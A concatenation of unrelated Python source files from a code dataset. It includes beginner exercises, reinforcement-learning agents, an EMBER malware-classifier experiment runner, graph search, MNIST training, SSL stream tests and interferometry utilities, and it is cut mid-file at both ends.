y=y-1\n\n\nprint(x)\nprint(y)\n","sub_path":"alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177253779","text":"list_1_100 = [ num for num in range(0,101) ]\n\n\"\"\"\nmeses = ('Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre')\n\nnumber = int(input(\"Ingrese un número\"))\nif 1 <= number <= len(meses)-1:\n print(meses[number])\nelse:\n raise Exception(\"nuevo error\")\n\"\"\"\n\"\"\"\nnumero_por_teclado = int(input(\"ingrese un número\"))\n\ntabla_de_multiplicar = [ numero_por_teclado*number for number in range(1,11) ]\nprint(tabla_de_multiplicar)\n\n\"\"\"\n\"\"\"\nlist_numbers = []\nwhile True:\n try:\n numero = int(input(\"Ingrese un número : \"))\n if numero == 0:\n break\n list_numbers.append(numero)\n except Exception:\n print(\"Ingrese solo números \")\nlist_numbers.sort()\nlist_numbers.sort(reverse=True)\nprint(list_numbers)\n\ncadena = input(\"Escribe una cadena : \")\nprint(cadena.split(\" \"))\n\"\"\"\ntupla_numeros = ( 1,2,3,4,1,1,2,2,3,44,5,56 )\n\nfrom functools import reduce\ndef cant_repeat(numberSearch,tuple_):\n count = 0\n for numberTuple in tuple_:\n if numberTuple == numberSearch: count+=1\n return count\n\ndef max_min(tupla):\n return { \"minimo\":min(tupla), \"maximo\":max(tupla) }\n\nprint(max_min((1,2,3,4,5,6,7,8,9,10)))\n\n\"\"\"\ndef pedir_contactos():\n contactos = {}\n while True:\n nombre = input(\"ingrese su nombre\")\n if nombre in contactos:\n print(\"el nombre ya se encuentra registrado\")\n else:\n numero_telefono = int(input(\"ingrese su telefono\"))\n contactos[nombre] = numero_telefono\n opcion = input(\" Desea escribir más contactos ? SI/NO si/no\")\n if opcion == \"NO\" or opcion == \"no\":\n break\n\"\"\"\n\ncreate_tuple = tuple([ x for x in range(1,11)])\nprint(create_tuple)\n\nlista_vacia = [ \" \" for x in range(0,10)]\n\nfor n in range(0,10):\n message = \"Ingrese el valor para la posición {0} : \".format(n)\n lista_vacia[n] = input(message)\n\n\n\n\n\n\n\n\n","sub_path":"cursos/ejercicios/discoduroroer/listas_tuplas_diccionarios.py","file_name":"listas_tuplas_diccionarios.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"624716025","text":"import torch\nimport torch.autograd as autograd\nimport torch.distributions as distributions\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\nfrom models import *\nfrom prototype import *\n\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# script_path = os.path.dirname(os.path.realpath(__file__))\n# model_path = os.path.join(script_path, 'model.pt')\n#\n# # Hyperparameters --- don't change, RL is very sensitive\n# learning_rate = 0.001\n# gamma = 0.98\n# buffer_limit = 5000\n# batch_size = 32\n# max_episodes = 2000\n# t_max = 600\n# min_buffer = 1000\n# target_update = 20 # episode(s)\n# train_steps = 10\n# max_epsilon = 1.0\n# min_epsilon = 0.01\n# epsilon_decay = 500\n# print_interval= 20\n#\n# Transition = collections.namedtuple('Transition', ('state', 'action', 'reward', 'next_state', 'done'))\nENT_COEF = 1e-2\n\n\nclass ActorCritic():\n # def __init__(self, env, network_model, existed_model):\n # self.log_probs = None\n #\n # self.actor = existed_model\n # self.critic_net = network_model(env.observation_space.shape, 1).to(device)\n # self.critic_target = network_model(env.observation_space.shape, 1).to(device)\n # self.action_critic = existed_model\n #\n # self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n # self.critic_optimizer = optim.Adam(self.critic_net.parameters(), lr=learning_rate)\n # self.action_critic_optimizer = optim.Adam(self.action_critic.parameters(), lr=learning_rate)\n def __init__(self, actor, critic_net, action_critic, network_model):\n self.log_probs = None\n\n self.actor = actor\n\n self.critic_net = critic_net\n self.critic_target = network_model(critic_net.input_shape, 1).to(device)\n self.critic_target.load_state_dict(self.critic_net.state_dict())\n self.critic_target.eval()\n\n self.action_critic = action_critic\n\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n self.critic_optimizer = optim.Adam(self.critic_net.parameters(), lr=learning_rate)\n self.action_critic_optimizer = optim.Adam(self.action_critic.parameters(), lr=learning_rate)\n\n def choose_action(self, state):\n if not isinstance(state, torch.FloatTensor):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n\n probabilities = F.softmax(self.actor.forward(state), dim=1)\n action_probs = distributions.Categorical(probabilities)\n action = action_probs.sample()\n self.log_probs = action_probs.log_prob(action)\n return action.item()\n # if not isinstance(state, torch.FloatTensor):\n # state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n # '''\n # FILL ME : This function should return epsilon-greedy action.\n #\n # Input:\n # * `state` (`torch.tensor` [batch_size, channel, height, width])\n # * `epsilon` (`float`): the probability for epsilon-greedy\n #\n # Output: action (`Action` or `int`): representing the action to be taken.\n # if action is of type `int`, it should be less than `self.num_actions`\n # '''\n # #Get a random number and determine if agent should exploit or explore\n # rand_num = np.random.random()\n # if(rand_num < epsilon):#explore by choosing random action\n # output_action = np.random.randint(self.model.num_actions)\n # else: #exploit by choosing best action\n # output_actions = self.model.forward(state)\n # output_action = torch.argmax(output_actions).item()\n # return output_action\n\n\n def learn(self, memory):\n if len(memory) >= batch_size:\n print(\"learn ---\")\n states, actions, rewards, next_states, dones = memory.sample(batch_size, device)\n \n \n # forward calc\n action_log_prob = self.actor(states)\n action_prob = F.softmax(action_log_prob, dim=1)\n action_log_prob = F.log_softmax(action_log_prob, dim=1)\n \n cur_value = self.critic_net(states).squeeze(1)\n next_value = self.critic_target(next_states)\n action_value = self.action_critic(states)\n \n # critic loss. eq (5) in SAC paper\n value_target = (action_value - ENT_COEF * action_log_prob).gather(1, actions).squeeze(1)\n critic_loss = 0.5 * F.smooth_l1_loss(cur_value, value_target.detach())\n \n # action critic loss. eq (7), (8) in SAC paper\n action_value_target = (rewards + gamma * (1 - dones) * next_value).squeeze(1)\n action_critic_loss = 0.5 * F.smooth_l1_loss(action_value.gather(1, actions).squeeze(1), action_value_target.detach())\n \n # actor loss. eq (10) in SAC paper\n actor_loss = torch.mean(action_prob*(action_log_prob- F.log_softmax(action_value.detach()/ENT_COEF, dim=1)))\n \n \n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n \n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n \n self.action_critic_optimizer.zero_grad()\n action_critic_loss.backward()\n self.action_critic_optimizer.step()\n \n self.critic_target.load_state_dict(self.critic_net.state_dict())\n \n #\n # critic_value = self.critic.forward(state)\n # critic_value_next = self.critic.forward(new_state)\n # td_error = ((reward + gamma * critic_value_next * (1- int(done))) - critic_value)\n #\n # actor_loss = -self.log_probs * td_error\n # critic_loss = td_error**2\n #\n # #print(actor_loss, critic_loss)\n # (actor_loss + critic_loss).backward()\n #\n # self.actor_optimizer.step()\n # self.critic_optimizer.step()\n return actor_loss, critic_loss, action_critic_loss\n\n def save_models(self):\n\n script_path = os.path.dirname(os.path.realpath(__file__))\n actor_model_path = os.path.join(script_path, 'actor_model.pt')\n actor_data = (self.actor.__class__.__name__, self.actor.state_dict(), self.actor.input_shape, self.actor.num_actions)\n torch.save(actor_data, actor_model_path)\n\n critic_model_path = os.path.join(script_path, 'critic_model.pt')\n critic_data = (self.critic_net.__class__.__name__, self.critic_net.state_dict(), self.critic_net.input_shape, self.critic_net.num_actions)\n torch.save(critic_data, critic_model_path)\n\n action_critic_model_path = os.path.join(script_path, 'action_critic_model.pt')\n action_critic_data = (self.action_critic.__class__.__name__, self.action_critic.state_dict(), self.action_critic.input_shape, self.action_critic.num_actions)\n torch.save(action_critic_data, action_critic_model_path)\n\n","sub_path":"HW3_task2-ac-v2-p/agent/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"436680271","text":"import os,sys,gc,itertools,tqdm\n\nsys.path.append(os.path.dirname(os.getcwd()))\nfrom boostember import *\n\nconfig = {\n 'booster': ['lgb'],\n 'experiment': ['emberboosting'],\n 'n_estimator': [10, 50, 100, 500, 1000],\n 'defaultdataset': [True],\n}\n\n#farr=['MEAN(coff_characteristics.coff_characteristics_hash_13)', 'MAX(datadirectories.size_CERTIFICATE_TABLE)', 'MEAN(imports_api.imports.imports_hash_20)', 'MAX(header_optional.optional_major_subsystem_version)', 'MIN(section_sections.MEAN(sections_props.props_hash_14))', 'MEAN(imports_api.imports_api_hash_10)', 'MAX(datadirectories.size_RESOURCE_TABLE)', 'STD(imports.imports_hash_16)', 'MODE(header_optional.optional_subsystem) = WINDOWS_GUI']\nfarr=['header_coff_characteristics_3', 'imports_libraries_hashed_117', 'header_optional_major_subsystem_version', 'strings_printabledist_74', 'header_optional_subsystem_8', 'datadirectories_RESOURCE_TABLE_size', 'datadirectories_CERTIFICATE_TABLE_size', 'datadirectories_DEBUG_virtual_address', 'header_coff_characteristics_0']\nfstr = ' and featureselect' if farr is not None else ''\n\ndef run():\n\n keys, values = zip(*config.items())\n experiments = tqdm.tqdm([dict(zip(keys, v)) for v in itertools.product(*values)])\n\n for experimentdict in experiments:\n exp = f'no AFE without featurehaser{fstr}' if experimentdict['defaultdataset'] else f'AFE without featurehaser{fstr}'\n experiments.set_description(\"{} \\n\".format(\"\\t\".join(f\"[{k}]: {v}\" for k, v in experimentdict.items())))\n run = Boosting(f'{experimentdict[\"booster\"]} n{experimentdict[\"n_estimator\"]} {exp}',\n experiment=experimentdict['experiment'], booster=experimentdict[\"booster\"],\n n_estimator=experimentdict[\"n_estimator\"], defaultdataset=experimentdict[\"defaultdataset\"],\n features=farr,\n dataset='/home/aizat/OneDrive/Master Project/Workspace/dataset/ember2018', n_jobs=21, verbose=False)\n run.main(cv=True, n=5)\n del run\n gc.collect()\n\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"scripts/lightgbm_ember.py","file_name":"lightgbm_ember.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38573873","text":"from collections import deque\n\nN, M, V = map(int, input().split())\ngraph = [[0]*(N+1) for _ in range(N+1)]\n\n\ndef dfs(v):\n print(v, end=' ')\n visited[v] = 1\n\n for w in graph[v]:\n if graph[v][w] and not visited[w]:\n dfs(w)\n\n\ndef bfs(v):\n Q = deque([v])\n visited[v] = 1\n while Q:\n q = Q.popleft()\n print(q, end=' ')\n for w in graph[q]:\n if graph[q][w] and not visited[w]:\n Q.append(w)\n visited[w] = 1\n\n\nfor _ in range(M):\n v, w = map(int, input().split())\n graph[v][w] = w\n graph[w][v] = v\n\n\nvisited = [0]*(N+1)\ndfs(V)\nprint()\nvisited = [0]*(N+1)\nbfs(V)\n\n","sub_path":"AHYEON/02.DFSBFS/1260_dfs와bfs.py","file_name":"1260_dfs와bfs.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"487527919","text":"from torch.autograd import Variable\nimport torch.nn as nn\n\n\nclass DefinitionClassifier(nn.Module):\n\n def __init__(self, feature_size, hidden_size, target_size,\n dropout=0.5):\n\n \"\"\"\n A two-layer neural network that accepts hidden states to predict the\n omitted target term from a passage missing the target term.\n\n The purpose of this model is to determine if the latent representations\n of the language model are rich enough to indicative of the words they\n are encoding.\n\n We allow the model to be minimal to test the richness of the features.\n\n Parameters:\n -----------\n :param feature_size: int\n The number of features we've selected from the model.\n :param target_size: int\n The size of the vocabulary in which to predict.\n :param hidden_size: int\n The number of hidden dimensions to map the input to before\n the output layer.\n \"\"\"\n # Save the construction arguments, useful for serialization\n self.init_arguments = locals()\n self.init_arguments.pop(\"self\")\n self.init_arguments.pop(\"__class__\")\n super(DefinitionClassifier, self).__init__()\n\n self.target_size = target_size\n self.hidden_size = hidden_size\n self.dropout = dropout\n\n self.model = nn.Sequential(\n nn.Linear(feature_size, hidden_size),\n nn.ReLU(),\n nn.Dropout(self.dropout),\n nn.Linear(hidden_size, target_size)\n )\n\n def forward(self, input):\n\n # Forward pass.\n # Shape: (1, target_size)\n return self.model(input)\n","sub_path":"metrics/feature_extraction/definition_classifier.py","file_name":"definition_classifier.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613867727","text":"'''\nFile Name: main \nAuthor: Shiming Luo\nDate: 2018.05.06\n'''\n\nimport numpy as np\nimport loader\nfrom preprocessing import *\nfrom architecture import *\n\nif __name__ == '__main__':\n \n ### load data\n mnist = loader.MNIST('/MNIST/raw/')\n train_images, train_labels = mnist.load_training()\n test_images, test_labels = mnist.load_testing()\n\n\n train_images,train_labels = preprocess(train_images,train_labels,60000)\n\n #### set up train, validation, test sets\n x_train = np.matrix(train_images[:50000]) ## N1*785\n x_val = np.matrix(train_images[50000:]) ## N2*785\n t_train = np.matrix(train_labels[:50000]).T ## N1*1\n t_val = np.matrix(train_labels[50000:]).T ## N2*1\n\n #### pre-processing\n x_train = z_score(x_train) ## N1*785\n x_val = z_score(x_val) ## N2*785\n\n t_train_original = t_train\n t_val_original = t_val\n\n t_train = one_hot(t_train) ## N1*10\n t_val = one_hot(t_val) ## N2*10\n\n ### constrct a one hidden layer model\n OneHM = OneHiddenModel()\n\n ### convert train set and validation set to array\n x_train = np.array(x_train)\n t_train = np.array(t_train)\n x_val = np.array(x_val)\n t_val = np.array(t_val)\n\n ### train 30 epoches\n epoches = 30\n for epoch in range(epoches):\n for m in range(len(x_train)//OneHM.batch_size):\n X = x_train[m*OneHM.batch_size : (m+1)*OneHM.batch_size]\n t = t_train[m*OneHM.batch_size : (m+1)*OneHM.batch_size]\n OneHM.train(X, t)\n if (epoch+1)%3 == 0:\n print('epoch: {}/{}'.format(epoch+1,epoches))\n error,acc = OneHM.evaluation(x_train,t_train)\n print('train error: {:.4f}, train accuracy: {:.2f}%'.format(error,100*acc))\n error,acc = OneHM.evaluation(x_val,t_val)\n print('valid error: {:.4f}, valid accuracy: {:.2f}%'.format(error,100*acc))\n\n\n","sub_path":".ipynb_checkpoints/main-checkpoint.py","file_name":"main-checkpoint.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271918686","text":"# So that float division is by default in python 2.7\nfrom __future__ import division\n\nimport pandas as pd\n\ndf = pd.read_csv('data/house_pricing.csv')\n\n\n# Enter Code Here\ndef cond_prob(df):\n df1 = df[df['Neighborhood']=='OldTown']['Neighborhood'].count()\n df2 = df.shape[0]\n conditional_prob = (df1/df2)*((df1-1)/(df2-1))*((df1-2)/(df2-2))\n\n return conditional_prob\n","sub_path":"q01_cond_prob/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"19750285","text":"import time\nimport gym\nfrom tensorboardX import SummaryWriter\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\nfrom rl.utils.rl_utils import test_model\nfrom rl.utils.exp_buffer import ExperienceBuffer, Experience\n\n\nclass DQN(nn.Module):\n def __init__(self, state_size_, action_size_, hidden_size_):\n super().__init__()\n self.state_size = state_size_\n self.action_size = action_size_\n self.hidden_size = hidden_size_\n\n self.fc1 = nn.Linear(self.state_size, self.hidden_size)\n self.fc2 = nn.Linear(self.hidden_size, self.hidden_size)\n self.fc3 = nn.Linear(self.hidden_size, self.action_size)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return self.fc3(x)\n\n\nclass Agent:\n def __init__(self, env, exp_buffer):\n self.env = env\n self.exp_buffer: ExperienceBuffer = exp_buffer\n self.state = None\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self._reset()\n\n def _reset(self):\n self.state = env.reset()\n self.total_reward = 0.0\n\n def play_step(self, net, epsilon=0.0):\n done_reward = None\n\n if np.random.random() < epsilon:\n action = env.action_space.sample()\n else:\n state_a = np.array([self.state], copy=False)\n model.eval()\n with torch.no_grad():\n state_v = torch.FloatTensor(state_a).to(self.device)\n q_vals_v = net(state_v)\n _, act_v = torch.max(q_vals_v, dim=1)\n action = int(act_v.item())\n\n # do step in the environment\n new_state, reward, is_done, _ = self.env.step(action)\n self.total_reward += reward\n\n exp = Experience(self.state, action, reward, is_done, new_state)\n self.exp_buffer.append(exp)\n self.state = new_state\n if is_done:\n done_reward = self.total_reward\n self._reset()\n return done_reward\n\n\ndef calc_loss(batch, net, tgt_net, device, GAMMA, double=True):\n states, actions, rewards, dones, next_states = batch\n\n states_v = torch.FloatTensor(states).to(device)\n next_states_v = torch.FloatTensor(next_states).to(device)\n actions_v = torch.tensor(actions).to(device)\n rewards_v = torch.FloatTensor(rewards).to(device)\n done_mask = torch.BoolTensor(dones).to(device)\n\n state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)\n if double:\n next_state_actions = net(next_states_v).max(1)[1]\n next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)\n else:\n next_state_values = tgt_net(next_states_v).max(1)[0]\n next_state_values[done_mask] = 0.0 # without this, training will not converge\n next_state_values = next_state_values.detach()\n\n expected_state_action_values = next_state_values * GAMMA + rewards_v\n return nn.MSELoss()(state_action_values, expected_state_action_values)\n\n\nif __name__ == '__main__':\n gamma = 0.99 # future reward discount\n EPSILON_DECAY_LAST_FRAME = 10 ** 5\n REPLAY_MIN_SIZE = 5000\n SYNC_TARGET_FRAMES = 1000\n target_reward = 199.9\n epsilon_start = 1.0 # exploration probability at start\n epsilon_stop = 0.01 # minimum exploration probability\n decay_rate = 0.0001 # exponential decay rate for exploration prob\n hidden_size = 64 # number of units in each Q-network hidden layer\n learning_rate = 0.0001 # Q-network learning rate\n replay_size = 10000 # memory capacity\n batch_size = 20 # experience mini-batch size\n\n env = gym.make('CartPole-v0')\n buffer = ExperienceBuffer(replay_size)\n agent = Agent(env, buffer)\n\n model = DQN(env.observation_space.shape[0], env.action_space.n, hidden_size)\n tgt_net = DQN(env.observation_space.shape[0], env.action_space.n, hidden_size)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n writer = SummaryWriter(comment=\"-CartPole\")\n total_rewards = []\n frame_idx = 0\n ts_frame = 0\n ts = time.time()\n best_mean_reward = None\n while True:\n frame_idx += 1\n epsilon = max(epsilon_stop, epsilon_start - frame_idx / EPSILON_DECAY_LAST_FRAME)\n\n reward = agent.play_step(model, epsilon)\n if reward is not None:\n total_rewards.append(reward)\n speed = (frame_idx - ts_frame) / (time.time() - ts)\n ts_frame = frame_idx\n ts = time.time()\n mean_reward = np.mean(total_rewards[-100:])\n print(\"%d: done %d games, mean reward %.3f, eps %.2f, speed %.2f f/s\" % (\n frame_idx, len(total_rewards), mean_reward, epsilon, speed))\n writer.add_scalar(\"epsilon\", epsilon, frame_idx)\n writer.add_scalar(\"speed\", speed, frame_idx)\n writer.add_scalar(\"reward_100\", mean_reward, frame_idx)\n writer.add_scalar(\"reward\", reward, frame_idx)\n if best_mean_reward is None or best_mean_reward < mean_reward:\n torch.save(model.state_dict(), \"/tmp/cart_pole_deep_q1_best.dat\")\n if best_mean_reward is not None:\n print(\"Best mean reward updated %.3f -> %.3f, model saved\" % (best_mean_reward, mean_reward))\n best_mean_reward = mean_reward\n if mean_reward > target_reward:\n print(\"Solved in %d frames!\" % frame_idx)\n break\n\n if len(buffer) < REPLAY_MIN_SIZE:\n continue\n\n if frame_idx % SYNC_TARGET_FRAMES == 0:\n tgt_net.load_state_dict(model.state_dict())\n\n model.train()\n optimizer.zero_grad()\n batch = buffer.sample(batch_size)\n loss_t = calc_loss(batch, model, tgt_net, device=agent.device, GAMMA=gamma)\n loss_t.backward()\n optimizer.step()\n writer.close()\n\n test_model(env, model, test_max_steps=400)\n env.close()\n","sub_path":"rl/q/cart_pole_deep_q_1.py","file_name":"cart_pole_deep_q_1.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"308570785","text":"# (The MIT License)\n#\n# Copyright (c) 2013 Kura\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport unittest\nimport random\nimport socket\n\nfrom tornado.options import options\nfrom tornado import iostream\n\nfrom blackhole.connection import connection_stream\nfrom blackhole import opts\nfrom blackhole.ssl_utils import sslkwargs\n\n\nclass BaseStream(unittest.TestCase):\n\n def setUp(self):\n options.ssl = False\n options.port = random.randint(5000, 10000)\n options.ssl_port = random.randint(5000, 10000)\n\n def tearDown(self):\n for s in self.sockets.values():\n s.close()\n self.sockets = {}\n\n\nclass TestSocketConnectionStream(BaseStream):\n\n def setUp(self):\n super(TestSocketConnectionStream, self).setUp()\n self.socket = socket.socket()\n\n def test_socket_connection_stream(self):\n self.assertTrue(isinstance(connection_stream(self.socket),\n iostream.IOStream))\n\n def tearDown(self):\n self.socket.close()\n\n\nclass TestSSLSocketConnectionStream(BaseStream):\n\n def setUp(self):\n super(TestSSLSocketConnectionStream, self).setUp()\n options.ssl = True\n sslkwargs['keyfile'] = os.path.join(os.path.dirname(__file__),\n 'test.key')\n sslkwargs['certfile'] = os.path.join(os.path.dirname(__file__),\n 'test.crt')\n self.socket = socket.socket()\n self.socket.bind(('127.0.0.1', options.ssl_port))\n\n def test_ssl_socket_connection_stream(self):\n self.assertTrue(isinstance(connection_stream(self.socket),\n iostream.SSLIOStream))\n\n def tearDown(self):\n self.socket.close()\n","sub_path":"tests/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"66737134","text":"import datetime, json\nclass Tracker:\n def __init__(self):\n self.moodFile = json.loads(open('moodData.json').read())\n \n def add(self):\n event = input('what happened: ' )\n date = str(datetime.datetime.now())\n value = int(input('give it a score: '))\n self.moodFile.update(\n {\n date:{\n event: value\n }\n }\n )\n \n def save(self):\n with open('moodData.json', 'w') as saveFile:\n saveFile.write(\n json.dumps(\n self.moodFile,\n indent = 2,\n sort_keys = True\n )\n )\n \nif __name__ == '__main__':\n myTracker = Tracker()\n myTracker.add()\n myTracker.save()\n","sub_path":"Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300627926","text":"\"\"\"\r\nVarious functions for fringefinder.\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nNotes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport copy\r\nimport csv\r\nimport math\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.widgets import Cursor\r\nfrom scipy import optimize\r\nplt.ion()\r\n\r\nfringefinderfuncs_directory = os.path.dirname(os.path.realpath(__file__)) #get path of wavelength_air.py\r\nsys.path.append(os.path.abspath(fringefinderfuncs_directory))\r\nfrom ref_index import edlen_ri, rh2wvpp #pylint: disable=C0413\r\n\r\ndef cpause(interval):\r\n \"\"\"custom pause function, to update only active figure\"\"\"\r\n backend = plt.rcParams['backend']\r\n if backend in matplotlib.rcsetup.interactive_bk:\r\n figManager = matplotlib._pylab_helpers.Gcf.get_active() #pylint: disable=W0212\r\n if figManager is not None:\r\n canvas = figManager.canvas\r\n if canvas.figure.stale:\r\n canvas.draw()\r\n canvas.start_event_loop(interval)\r\n return\r\n\r\ndef manual_ballcenter(ballimage, ballimageax):\r\n \"\"\"\r\n manual_ballcenter.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Take input from user for ball edge position, fit circle, output x,y coordinates and radius\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -guinputs\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.00 to v1.00\r\n June 13, 2018\r\n -converted to python by hand to have identical behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n ballimageax.imshow(ballimage, cmap='gray')\r\n\r\n ballimageax.set_title('Pick points believed to be the ball edge. Right-click when done.')\r\n ballcursor = Cursor(ballimageax, useblit=True, color='C8', linewidth=1, alpha=0.5) #pylint: disable=W0612\r\n xy = plt.ginput(n=0, mouse_add=1, mouse_pop=2, mouse_stop=3, timeout=0)\r\n x = np.asarray(xy)[:, 0]\r\n y = np.asarray(xy)[:, 1]\r\n plt.plot(x, y, 'C2+')\r\n\r\n xc, yc, r = circfit(x, y)\r\n\r\n return xc, yc, r\r\n\r\ndef wavelength_air(T_air, RH, P, lambda_vac):\r\n \"\"\"\r\n wavelength_air.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate wavelength in air using Edlen\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n verified against Engineering Metrology Toolbox (http://emtoolbox.nist.gov/Wavelength/Edlen.asp)\r\n ported from strang_ambients.m v1.12\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n - T_air - temperature of air, deg. C\r\n - RH - relative humidity of air, %RH\r\n - P - beam air pressure, kPa\r\n - lambda_vac - vacuum wavelength of light source\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - lambda_air - wavelength of light in ambient air, nm\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.12 to v1.00\r\n June 13, 2018\r\n -converted to python by hand to have identical behavior\r\n -changed instrument input to wavelength input\r\n -removed toggle of frequency or wavelength. now only wavelength in nm\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n n_air = edlen_ri(lambda_vac, T_air, P*1e3, rh2wvpp(RH, T_air))\r\n return lambda_vac/n_air\r\n\r\ndef circfit(x, y):\r\n \"\"\"\r\n circfit.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Take input from user for ball edge position, fit circle, output x,y coordinates and radius\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -x - array of x-coordinates\r\n -y - array of y-coordinates\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n June 14, 2018\r\n -initial version. NOT a port of circfit.m\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n def calc_R(xc, yc):\r\n \"\"\"\r\n internal function for circfit\r\n \"\"\"\r\n return np.sqrt((x-xc)**2 + (y-yc)**2)\r\n def f_2(c):\r\n \"\"\"\r\n internal function for circfit\r\n \"\"\"\r\n Ri = calc_R(*c)\r\n return 